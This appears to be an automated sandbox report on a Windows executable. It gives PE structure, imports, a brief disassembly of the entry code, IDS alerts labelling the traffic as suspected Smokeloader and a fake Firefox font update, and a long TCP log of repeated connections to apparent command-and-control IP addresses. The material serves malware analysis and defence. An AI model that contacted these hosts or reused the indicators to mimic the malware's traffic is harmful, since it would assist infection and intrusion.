                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v......................................xc.....................................Rich............PE..L...~..e...................
                                                                                                                        Icon Hash:0323252521170f17
                                                                                                                        Entrypoint:0x4016eb
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x65D9F07E [Sat Feb 24 13:34:54 2024 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:5
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:5
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:5
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:0b72f9871877c1429fc389a1eb1f1d2b
                                                                                                                        Instruction
                                                                                                                        call 00007FEC98861DA9h
                                                                                                                        jmp 00007FEC9885F06Dh
                                                                                                                        mov edi, edi
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        sub esp, 00000328h
                                                                                                                        mov dword ptr [00420208h], eax
                                                                                                                        mov dword ptr [00420204h], ecx
                                                                                                                        mov dword ptr [00420200h], edx
                                                                                                                        mov dword ptr [004201FCh], ebx
                                                                                                                        mov dword ptr [004201F8h], esi
                                                                                                                        mov dword ptr [004201F4h], edi
                                                                                                                        mov word ptr [00420220h], ss
                                                                                                                        mov word ptr [00420214h], cs
                                                                                                                        mov word ptr [004201F0h], ds
                                                                                                                        mov word ptr [004201ECh], es
                                                                                                                        mov word ptr [004201E8h], fs
                                                                                                                        mov word ptr [004201E4h], gs
                                                                                                                        pushfd
                                                                                                                        pop dword ptr [00420218h]
                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                        mov dword ptr [0042020Ch], eax
                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                        mov dword ptr [00420210h], eax
                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                        mov dword ptr [0042021Ch], eax
                                                                                                                        mov eax, dword ptr [ebp-00000320h]
                                                                                                                        mov dword ptr [00420158h], 00010001h
                                                                                                                        mov eax, dword ptr [00420210h]
                                                                                                                        mov dword ptr [0042010Ch], eax
                                                                                                                        mov dword ptr [00420100h], C0000409h
                                                                                                                        mov dword ptr [00420104h], 00000001h
                                                                                                                        mov eax, dword ptr [0041F008h]
                                                                                                                        mov dword ptr [ebp-00000328h], eax
                                                                                                                        mov eax, dword ptr [0041F00Ch]
                                                                                                                        mov dword ptr [ebp-00000324h], eax
                                                                                                                        call dword ptr [000000C4h]
                                                                                                                        Programming Language:
                                                                                                                        • [C++] VS2008 build 21022
                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                        • [LNK] VS2008 build 21022
                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1e6340x50.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40e0000xc390.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x1d0000x178.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x1b5000x1b600c173ea61c5b8c95b8dd9fe083e692a0bFalse0.626007776826484data6.26371473137505IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x1d0000x1f020x2000dcf31f9faad9936987278a6744061b17False0.3560791015625data5.5063636226432084IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x1f0000x3e77bc0x12005067901f9f416eaf5f2e13f92c7e71b2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .voheba0x4070000x49480x3e0051596dda30fc38f0df3556d6f115256dFalse0.0023941532258064517data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .yovu0x40c0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .lobudib0x40d0000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x40e0000xc3900xc400a4912bf414f73e5b56a1f03fa5cae900False0.4240672831632653data4.406680623692904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        RT_ICON0x40e5400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SpanishPeru0.3723347547974414
                                                                                                                        RT_ICON0x40f3e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SpanishPeru0.47382671480144406
                                                                                                                        RT_ICON0x40fc900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SpanishPeru0.5213133640552995
                                                                                                                        RT_ICON0x4103580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SpanishPeru0.536849710982659
                                                                                                                        RT_ICON0x4108c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SpanishPeru0.39927385892116185
                                                                                                                        RT_ICON0x412e680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SpanishPeru0.4148686679174484
                                                                                                                        RT_ICON0x413f100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SpanishPeru0.46557377049180326
                                                                                                                        RT_ICON0x4148980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SpanishPeru0.46808510638297873
                                                                                                                        RT_STRING0x414f400x55adata0.44452554744525546
                                                                                                                        RT_STRING0x4154a00x43adata0.4676524953789279
                                                                                                                        RT_STRING0x4158e00x130data0.5032894736842105
                                                                                                                        RT_STRING0x415a100x73cdata0.4195464362850972
                                                                                                                        RT_STRING0x4161500x686data0.4353293413173653
                                                                                                                        RT_STRING0x4167d80x840data0.4237689393939394
                                                                                                                        RT_STRING0x4170180x768data0.4240506329113924
                                                                                                                        RT_STRING0x4177800x8c4data0.4180035650623886
                                                                                                                        RT_STRING0x4180480x7bcdata0.41919191919191917
                                                                                                                        RT_STRING0x4188080x612data0.4395109395109395
                                                                                                                        RT_STRING0x418e200x7e6data0.4228486646884273
                                                                                                                        RT_STRING0x4196080x672data0.43575757575757573
                                                                                                                        RT_STRING0x419c800x53edata0.4493293591654247
                                                                                                                        RT_STRING0x41a1c00x1d0data0.5086206896551724
                                                                                                                        RT_ACCELERATOR0x414d780x18data1.3333333333333333
                                                                                                                        RT_GROUP_ICON0x414d000x76dataSpanishPeru0.6610169491525424
                                                                                                                        RT_VERSION0x414d900x1acdata0.5794392523364486
                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllWriteConsoleOutputCharacterW, GetConsoleAliasExesLengthA, InterlockedDecrement, GetLogicalDriveStringsW, SetDefaultCommConfigW, GetSystemWindowsDirectoryW, GetEnvironmentStringsW, InterlockedCompareExchange, GetTimeFormatA, GetModuleHandleW, GetConsoleAliasesA, ReadConsoleOutputA, GetCommandLineA, GetVolumePathNameW, GlobalAlloc, LoadLibraryW, GetLocaleInfoW, GetProcessHandleCount, GetConsoleAliasW, GetModuleFileNameW, GetFileSize, GetStringTypeExA, GetLastError, GetProcAddress, MoveFileW, BuildCommDCBW, OpenWaitableTimerA, WriteConsoleA, GetModuleFileNameA, GetModuleHandleA, QueryMemoryResourceNotification, GetShortPathNameW, SetThreadAffinityMask, FindAtomW, OpenFileMappingA, GetSystemTime, DisconnectNamedPipe, GetThreadContext, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                                                                                                        USER32.dllGetMonitorInfoA, GetClassLongW
                                                                                                                        ADVAPI32.dllGetAce
                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        SpanishPeru
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-11-30T11:11:50.241243+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450064103.35.190.240443TCP
                                                                                                                        2024-11-30T11:12:26.661625+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449736189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:28.539115+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449737189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:30.464957+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449738189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:32.393771+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449739189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:34.315997+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449740189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:36.283892+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449741189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:38.493730+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449742189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:40.415342+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449743189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:42.336279+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449744189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:44.476603+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449745189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:46.397930+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449746189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:48.544489+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:50.425797+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449748189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:52.340198+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449749189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:54.211867+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449750189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:56.083759+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449752189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:57.964234+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449754189.163.166.5280TCP
                                                                                                                        2024-11-30T11:12:59.830749+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449755189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:01.802938+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449761189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:03.676363+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449767189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:05.644767+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449773189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:07.570894+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449778189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:09.507541+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449780189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:12.097931+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44979123.145.40.181443TCP
                                                                                                                        2024-11-30T11:13:15.257748+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449797189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:17.454825+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449803189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:19.374519+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449809189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:21.288923+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449815189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:23.209112+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449819189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:25.128970+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449823189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:27.270542+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449828189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:29.204841+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449834189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:31.076893+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449840189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:33.046649+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449842189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:34.998162+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449847189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:36.925631+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449853189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:39.051723+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449859189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:41.033201+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449865189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:42.994728+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449869189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:44.395105+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44987523.145.40.181443TCP
                                                                                                                        2024-11-30T11:13:47.602500+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449881189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:49.522920+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449887189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:51.429121+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449890189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:53.395941+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449896189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:55.345806+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449902189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:57.270618+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449908189.163.166.5280TCP
                                                                                                                        2024-11-30T11:13:59.357155+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449912189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:01.341053+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449915189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:03.218592+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449921189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:05.094798+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449927189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:07.246905+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449932189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:09.171651+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449937189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:11.136134+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449941189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:13.297021+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449946189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:15.211720+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449953189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:17.129851+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449959189.163.166.5280TCP
                                                                                                                        2024-11-30T11:14:56.054784+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449949207.246.75.248443TCP
                                                                                                                        2024-11-30T11:15:29.907269+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450061123.213.233.13180TCP
                                                                                                                        2024-11-30T11:15:39.774346+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450062123.213.233.13180TCP
                                                                                                                        2024-11-30T11:15:50.872341+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450065123.213.233.13180TCP
                                                                                                                        2024-11-30T11:16:02.791232+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450066123.213.233.13180TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 30, 2024 11:12:24.786530018 CET4973680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:24.907808065 CET8049736189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:24.907888889 CET4973680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:24.908046961 CET4973680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:24.908066034 CET4973680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:25.027981997 CET8049736189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:25.028008938 CET8049736189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:26.650377035 CET8049736189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:26.661560059 CET8049736189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:26.661624908 CET4973680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:26.662062883 CET4973680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:26.664829969 CET4973780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:26.782062054 CET8049736189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:26.784884930 CET8049737189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:26.785077095 CET4973780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:26.785270929 CET4973780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:26.785303116 CET4973780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:26.905157089 CET8049737189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:26.906296015 CET8049737189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:28.533607960 CET8049737189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:28.539052010 CET8049737189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:28.539114952 CET4973780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:28.539167881 CET4973780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:28.542660952 CET4973880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:28.659298897 CET8049737189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:28.662678003 CET8049738189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:28.662743092 CET4973880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:28.662853003 CET4973880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:28.662890911 CET4973880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:28.782820940 CET8049738189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:28.782876968 CET8049738189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:30.464797974 CET8049738189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:30.464907885 CET8049738189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:30.464956999 CET4973880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:30.465029001 CET4973880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:30.467318058 CET4973980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:30.585114002 CET8049738189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:30.587481976 CET8049739189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:30.587569952 CET4973980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:30.587718010 CET4973980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:30.587743998 CET4973980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:30.708878040 CET8049739189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:30.708906889 CET8049739189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:32.393549919 CET8049739189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:32.393630981 CET8049739189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:32.393770933 CET4973980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:32.393804073 CET4973980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:32.396136045 CET4974080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:32.513982058 CET8049739189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:32.516309023 CET8049740189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:32.516407967 CET4974080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:32.517201900 CET4974080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:32.517262936 CET4974080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:32.637135983 CET8049740189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:32.637257099 CET8049740189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:34.315684080 CET8049740189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:34.315912008 CET8049740189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:34.315996885 CET4974080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:34.335463047 CET4974080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:34.369910002 CET4974180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:34.455459118 CET8049740189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:34.490037918 CET8049741189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:34.490101099 CET4974180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:34.490216017 CET4974180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:34.490226030 CET4974180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:34.610347986 CET8049741189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:34.610409975 CET8049741189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:36.283663034 CET8049741189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:36.283819914 CET8049741189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:36.283891916 CET4974180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:36.284030914 CET4974180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:36.286278963 CET4974280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:36.404022932 CET8049741189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:36.406249046 CET8049742189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:36.406349897 CET4974280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:36.406519890 CET4974280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:36.406564951 CET4974280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:36.527091026 CET8049742189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:36.527527094 CET8049742189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:38.493619919 CET8049742189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:38.493659973 CET8049742189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:38.493730068 CET4974280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:38.493901968 CET4974280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:38.496118069 CET4974380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:38.614129066 CET8049742189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:38.616069078 CET8049743189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:38.616153955 CET4974380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:38.616270065 CET4974380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:38.616338015 CET4974380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:38.736273050 CET8049743189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:38.736319065 CET8049743189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:40.403886080 CET8049743189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:40.415250063 CET8049743189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:40.415342093 CET4974380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:40.415376902 CET4974380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:40.418051958 CET4974480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:40.536046028 CET8049743189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:40.538872004 CET8049744189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:40.538949966 CET4974480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:40.539100885 CET4974480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:40.539115906 CET4974480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:40.659393072 CET8049744189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:40.659476042 CET8049744189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:42.335429907 CET8049744189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:42.336205959 CET8049744189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:42.336278915 CET4974480192.168.2.4189.163.166.52
